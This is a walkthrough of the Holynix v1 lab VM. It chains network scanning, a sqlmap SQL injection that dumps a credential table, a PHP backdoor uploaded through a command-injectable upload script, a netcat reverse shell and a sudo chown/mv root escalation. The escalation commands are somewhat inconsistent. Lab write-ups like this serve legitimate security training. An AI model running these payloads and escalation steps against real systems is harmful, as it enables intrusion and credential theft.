Holynix: v1 – Walkthrough

Today, I’m trouble with some network configure problem about this virtual machine. I try to fix many time this box to exploit. After 6 hours later,access the ip via VMWare.

Ok. Let’s get start.

┌─[[email protected]]─[~]
└──> netdiscover

 Currently scanning: 192.168.13.0/16   |   Screen View: Unique Hosts           
                                                                               
 14 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 840              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.1     60:e3:27:be:75:78      4     240  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.0.100   34:97:f6:c3:0b:66      8     480  ASUSTek COMPUTER INC.       
 192.168.0.101   00:0c:29:bc:05:de      2     120  VMware, Inc.

 

Target ip is 192.168.0.101. Nmap and dirbuster are running now to know the system information.

┌─[✗]─[[email protected]]─[~]
└──> nmap -sV 192.168.0.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-02 02:17 +0630
Nmap scan report for 192.168.0.101
Host is up (0.00089s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
┌─[[email protected]]─[~]
└──> dirb http://192.168.0.101 -r

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.101/ ----
==> DIRECTORY: http://192.168.0.101/~bin/                                      
==> DIRECTORY: http://192.168.0.101/~mail/                                     
==> DIRECTORY: http://192.168.0.101/~sys/                                      
+ http://192.168.0.101/calender (CODE:200|SIZE:247)                            
+ http://192.168.0.101/cgi-bin/ (CODE:403|SIZE:329)                            
+ http://192.168.0.101/footer (CODE:200|SIZE:63)                               
+ http://192.168.0.101/header (CODE:200|SIZE:604)                              
+ http://192.168.0.101/home (CODE:200|SIZE:109)                                
==> DIRECTORY: http://192.168.0.101/img/                                       
+ http://192.168.0.101/index (CODE:200|SIZE:776)                               
+ http://192.168.0.101/index.php (CODE:200|SIZE:776)                           
+ http://192.168.0.101/login (CODE:200|SIZE:342)                               
+ http://192.168.0.101/messageboard (CODE:200|SIZE:249)                        
==> DIRECTORY: http://192.168.0.101/misc/                                      
+ http://192.168.0.101/server-status (CODE:403|SIZE:334)                       
+ http://192.168.0.101/transfer (CODE:200|SIZE:44)                             
==> DIRECTORY: http://192.168.0.101/upload/                                    
                                                                               
-----------------
END_TIME: Tue Jan  2 02:17:34 2018
DOWNLOADED: 4612 - FOUND: 11

Just port 80, Sure? Try Again for make sure to check all ports.

nmap -p- -sS 192.168.0.101 -mtu 24

Same. OK. Explore to port 80 with browser.

http://192.168.0.101/index.php?page=login.php

It look like File Inclusion,I test some exploit of file inclusion but it not work, I also fuzzing the /etc/passwd with hex decoding.

Ok, Now need to check login form. admin admin are not working but admin’ at the username and password are showing sql error. Yeah!

Try with sqlmap

┌─[[email protected]]─[~]
└──> sqlmap -u "http://192.168.0.101/index.php?page=login.php" --data="user_name=admin&password=admin&Submit_button=Submit" -p password --is-dba
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:26:34

[02:26:35] [INFO] resuming back-end DBMS 'mysql' 
[02:26:35] [INFO] testing connection to the target URL
[02:26:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: user_name=admin&password=admin' UNION ALL SELECT CONCAT(0x716b707071,0x6346586653424a444f50624c485042535672506245636f6b436e6d6650797656656d5a7a756b4a69,0x7176787171),NULL,NULL,NULL-- FqHO&Submit_button=Submit
---
[02:26:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[02:26:35] [INFO] testing if current user is DBA
[02:26:35] [INFO] fetching current user
current user is DBA:    False
[02:26:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.101'

[*] shutting down at 02:26:35

We can’t upload shell.Therefore we need to dump all data.

Database: creds                                                                                                      
Table: accounts
[11 entries]
+-----+--------+------------+----------------------+
| cid | upload | username   | password             |
+-----+--------+------------+----------------------+
| 1   | 0      | alamo      | Ih%40cK3dM1cR05oF7   |
| 2   | 1      | etenenbaum | P3n7%40g0n0wN3d      |
| 3   | 1      | gmckinnon  | d15cL0suR3Pr0J3c7    |
| 4   | 1      | hreiser    | Ik1Ll3dNiN%40r315er  |
| 5   | 1      | jdraper    | p1%40yIngW17hPh0n35  |
| 6   | 1      | jjames     | %40rR35t3D%40716     |
| 7   | 1      | jljohansen | m%40k1nGb0o7L3g5     |
| 8   | 1      | kpoulsen   | wH%407ar37H3Fed5D01n |
| 9   | 0      | ltorvalds  | f%407H3r0FL1nUX      |
| 10  | 1      | mrbutler   | n%405aHaSw0rM5       |
| 11  | 1      | rtmorris   | Myd%40d51N7h3NSA     |
+-----+--------+------------+----------------------+

OK, We got username and password. No more to wait admin login. Note %40 is equal with @. 😉 . I use last user rtmorris.

Login success and found uploader. OK, Let’s try to upload php file. create backdoor php file and upload success but i can’t find my uploaded file. so what?

http://192.168.0.101/index.php?page=bd.php
http://192.168.0.101/img/bd.php
http://192.168.0.101/upload/bd.php
http://192.168.0.101/transfer/bd.php
http://192.168.0.101/messageboard/bd.php

All error. Where was my uploaded file?.  After thinking few minutes later, notice the url

==> DIRECTORY: http://192.168.0.101/~bin/                                                                            
==> DIRECTORY: http://192.168.0.101/~mail/                                                                           
==> DIRECTORY: http://192.168.0.101/~sys/

It Forbidden, Ok, I need to enumerate more and more.

Yes I see /etc/passwd. It is file inclusion vulnerable so i try to read upload php file. upload file submit to transfer.php. Try to read transfer file,

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
	if ( $upload == 1 )
	{
		$homedir = "/home/".$logged_in_user. "/";
		$uploaddir = "upload/";
		$target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
		$uploaded_type = $_FILES['uploaded']['type'];
		$command=0;
		$ok=1;

		if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {	$command = 1; }

		if ($ok==0)
		{
			echo "Sorry your file was not uploaded";
			echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
		} else {
        		if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
			{
				echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
				echo "The ownership of the uploaded file(s) have been changed accordingly.";
				echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
				if ( $command == 1 )
				{
					exec("sudo tar xzf " .$target. " -C " .$homedir);
					exec("rm " .$target);
				} else {
					exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
				}
				exec("/var/apache2/htdocs/update_own");
        		} else {
				echo "Sorry, there was a problem uploading your file.<br />";
				echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
			}
		}
	} else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>

Now I know the process flow and found the user dir path. I login with rtmorris username so the path will be following.

http://192.168.0.101/~rtmorris/
┌─[[email protected]]─[~/Desktop/test]
└──> tar czf bd.php.tar.gz bd.php

 

Time to back connect, I use python first but fail and then i use bash.

┌─[✗]─[[email protected]]─[~/Desktop/test]
└──> nc -lvp 5555
listening on [any] 5555 ...
192.168.0.101: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.101] 48302
python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/home/rtmorris$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/home/rtmorris$ 

Now i check user sudo -l and exploit!

sudo -l
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
cp /bin/bash .
sudo chown root:root bash
sudo mv /bin/chgrp /bin/chgrp
sudo mv /tmp/bash /bin/chgrp
sudo chgrp
id
uid=0(root) gid=0(root) groups=0(root)

Bango! we got root!… Thanks for reading. Happy Hacking .